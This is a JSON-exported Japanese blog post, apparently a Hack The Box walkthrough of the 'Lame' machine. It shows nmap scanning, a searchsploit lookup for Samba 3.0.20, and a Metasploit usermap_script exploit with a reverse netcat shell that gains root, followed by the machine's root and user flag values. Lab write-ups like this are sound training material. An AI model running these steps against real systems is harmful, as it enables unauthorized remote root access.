{"id":3704,"date":"2020-08-02T22:03:28","date_gmt":"2020-08-02T13:03:28","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3704"},"modified":"2020-08-30T23:37:21","modified_gmt":"2020-08-30T14:37:21","slug":"hack-the-box-lake-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3704","title":{"rendered":"Hack The Box – Lake – Walkthrough"},"content":{"rendered":"

Samba\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d<\/h3>\n
\r\n# nmap -A -n -F -T5 lame.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 08:55 UTC\r\nNmap scan report for lame.htb (10.10.10.3)\r\nHost is up (0.047s latency).\r\nNot shown: 96 filtered ports\r\nPORT    STATE SERVICE     VERSION\r\n21\/tcp  open  ftp         vsftpd 2.3.4\r\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n| ftp-syst:\r\n|   STAT:\r\n| FTP server status:\r\n|      Connected to 10.10.14.8\r\n|      Logged in as ftp\r\n|      TYPE: ASCII\r\n|      No session bandwidth limit\r\n|      Session timeout in seconds is 300\r\n|      Control connection is plain text\r\n|      Data connections will be plain text\r\n|      vsFTPd 2.3.4 - secure, fast, stable\r\n|_End of status\r\n22\/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\r\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\r\n139\/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n445\/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\r\n\r\nHost script results:\r\n|_clock-skew: mean: 2h05m22s, deviation: 2h49m43s, median: 5m21s\r\n| smb-os-discovery:\r\n|   OS: Unix (Samba 3.0.20-Debian)\r\n|   Computer name: lame\r\n|   NetBIOS computer name:\r\n|   Domain name: hackthebox.gr\r\n|   FQDN: lame.hackthebox.gr\r\n|_  System time: 2020-08-02T05:01:18-04:00\r\n| smb-security-mode:\r\n|   account_used: <blank>\r\n|   authentication_level: user\r\n|   challenge_response: supported\r\n|_  message_signing: disabled (dangerous, but default)\r\n|_smb2-time: Protocol negotiation failed (SMB2)\r\n<\/pre>\n
Samba\u306e\u8106\u5f31\u6027\u3092\u691c\u7d22<\/h3>\n
\u691c\u7d22\u3057\u305f\u7d50\u679c ‘Username’ map script’ Command Execution (Metasploit)\u3092\u5229\u7528\u3057\u3066\u307f\u308b\u3053\u3068\u306b\u3002<\/p>\n
\r\n# apt install exploitdb\r\n# searchsploit samba 3.0.20\r\n---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                                                      |  Path\r\n---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nSamba 3.0.10 < 3.3.5 - Format String \/ Security Bypass                                                                                              | multiple\/remote\/10095.txt\r\nSamba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                    | unix\/remote\/16320.rb\r\nSamba < 3.0.20 - Remote Heap Overflow                                                                                                               | linux\/remote\/7701.txt\r\nSamba < 3.0.20 - Remote Heap Overflow                                                                                                               | linux\/remote\/7701.txt\r\nSamba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                       | linux_x86\/dos\/36741.py\r\n---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n<\/pre>\n
Metasploit\u306e\u5b9f\u884c<\/h3>\n
\r\n# apt install metasploit-framework\r\n# \/etc\/init.d\/postgresql start\r\nStarting PostgreSQL 12 database server: main.\r\n \r\nroot@81c581d5cf43:\/# update-rc.d postgresql enable\r\n \r\nroot@81c581d5cf43:\/# msfdb init\r\n...\r\n\r\n# msfconsole\r\n ______________________________________________________________________________\r\n|                                                                              |\r\n|                          3Kom SuperHack II Logon                             |\r\n|______________________________________________________________________________|\r\n|                                                                              |\r\n|                                                                              |\r\n|                                                                              |\r\n|                 User Name:          [   security    ]                        |\r\n|                                                                              |\r\n|                 Password:           [               ]                        |\r\n|                                                                              |\r\n|                                                                              |\r\n|                                                                              |\r\n|                                   [ OK ]                                     |\r\n|______________________________________________________________________________|\r\n|                                                                              |\r\n|                                                       https:\/\/metasploit.com |\r\n|______________________________________________________________________________|\r\n\r\n\r\n       =[ metasploit v5.0.100-dev                         ]\r\n+ -- --=[ 2046 exploits - 1106 auxiliary - 344 post       ]\r\n+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=[ 7 evasion                                       ]\r\n\r\nMetasploit tip: Writing a custom module? After editing your module, why not try the reload command\r\n\r\nmsf5 > search samba\r\n\r\nMatching Modules\r\n================\r\n\r\n   #   Name                                                 Disclosure Date  Rank       Check  Description\r\n   -   ----                                                 ---------------  ----       -----  -----------\r\n   0   auxiliary\/admin\/smb\/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal\r\n   1   auxiliary\/dos\/samba\/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow\r\n   2   auxiliary\/dos\/samba\/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow\r\n   3   auxiliary\/dos\/samba\/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow\r\n   4   auxiliary\/scanner\/rsync\/modules_list                                  normal     No     List Rsync Modules\r\n   5   auxiliary\/scanner\/smb\/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State\r\n   6   exploit\/freebsd\/samba\/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)\r\n   7   exploit\/linux\/samba\/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)\r\n   8   exploit\/linux\/samba\/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load\r\n   9   exploit\/linux\/samba\/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow\r\n   10  exploit\/linux\/samba\/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow\r\n   11  exploit\/linux\/samba\/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)\r\n   12  exploit\/multi\/samba\/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow\r\n   13  exploit\/multi\/samba\/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution\r\n   14  exploit\/osx\/samba\/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow\r\n   15  exploit\/osx\/samba\/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)\r\n   16  exploit\/solaris\/samba\/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow\r\n   17  exploit\/solaris\/samba\/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)\r\n   18  exploit\/unix\/http\/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection\r\n   19  exploit\/unix\/misc\/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution\r\n   20  exploit\/unix\/webapp\/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution\r\n   21  exploit\/windows\/fileformat\/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution\r\n   22  exploit\/windows\/http\/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow\r\n   23  exploit\/windows\/license\/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow\r\n   24  exploit\/windows\/smb\/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource\r\n   25  post\/linux\/gather\/enum_configs                                        normal     No     Linux Gather Configurations\r\n\r\nInteract with a module by name or index, for example use 25 or use post\/linux\/gather\/enum_configs\r\n\r\nmsf5 > use exploit\/multi\/samba\/usermap_script\r\n[*] No payload configured, defaulting to cmd\/unix\/reverse_netcat\r\nmsf5 exploit(multi\/samba\/usermap_script) > show options\r\n\r\nModule options (exploit\/multi\/samba\/usermap_script):\r\n\r\n   Name    Current Setting  Required  Description\r\n   ----    ---------------  --------  -----------\r\n   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n   RPORT   139              yes       The target port (TCP)\r\n\r\n\r\nPayload options (cmd\/unix\/reverse_netcat):\r\n\r\n   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   LHOST  172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT  4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\nmsf5 exploit(multi\/samba\/usermap_script) > set RHOSTS lame.htb\r\nRHOSTS => lame.htb\r\nmsf5 exploit(multi\/samba\/usermap_script) > set LHOST\r\nset LHOST\r\nmsf5 exploit(multi\/samba\/usermap_script) > set LHOST 10.10.x.x\r\nLHOST => 10.10.x.x\r\nmsf5 exploit(multi\/samba\/usermap_script) > set LPORT 1234\r\nLPORT => 1234\r\nmsf5 exploit(multi\/samba\/usermap_script) > exploit\r\n[-] Handler failed to bind to 10.10.x.x:1234:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:1234\r\n[*] Command shell session 1 opened (172.17.0.2:1234 -> 172.17.0.1:60758) at 2020-08-02 12:56:28 +0000\r\n\r\nid\r\nuid=0(root) gid=0(root)\r\n\r\ncat \/root\/root.txt\r\n92caac3be140ef409e45721348a4e9df\r\n\r\ncd \/home\r\n\r\nls\r\nftp\r\nmakis\r\nservice\r\nuser\r\ncd makis\r\n\r\ncat \/home\/makis\/user.txt\r\n69454a937d94f5f0225ea00acd2e84c5\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
Samba\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d # nmap -A -n -F -T5 lame.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 08:55 UTC […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3704"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3704"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3704\/revisions"}],"predecessor-version":[{"id":3793,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3704\/revisions\/3793"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}